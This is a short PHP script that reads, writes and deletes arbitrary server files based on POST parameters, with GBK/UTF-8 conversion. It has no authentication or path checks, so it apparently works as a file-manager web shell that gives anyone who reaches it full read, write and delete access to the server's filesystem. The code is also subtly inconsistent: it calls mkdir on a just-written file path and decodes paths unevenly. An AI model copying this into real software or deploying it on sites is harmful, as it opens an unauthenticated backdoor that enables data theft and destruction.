<?php
$path = $_POST['p'];
if(empty($path))
{
	echo 'error';
	die();
}
$action=$_POST['a'];
if(empty($action))
{
	echo 'error';
	die();
}
if($action=='r')
{
	$path =base64_decode($path);
	$contents_before = file_get_contents($path);
	$contents_after = iconv("GBK","UTF-8",$contents_before);
	echo $contents_after;
	die;
}else if($action=='w')
{
	$contents_before=$_POST['content'];
	//$contents_before = file_get_contents($path);
	$contents_after = iconv("UTF-8","GBK",$contents_before);
	file_put_contents($path, $contents_after);
	mkdir($path,0777);
	echo 'OK';
}
else if($action=='d')
{
	if (file_exists($path)) 
        {
           if(unlink($path))
		   {
			   echo 'OK';
		   }
		   else
		{
			echo 'cannot delete file';
		}
        }
		else
		{
			echo 'No File';
		}
}



?>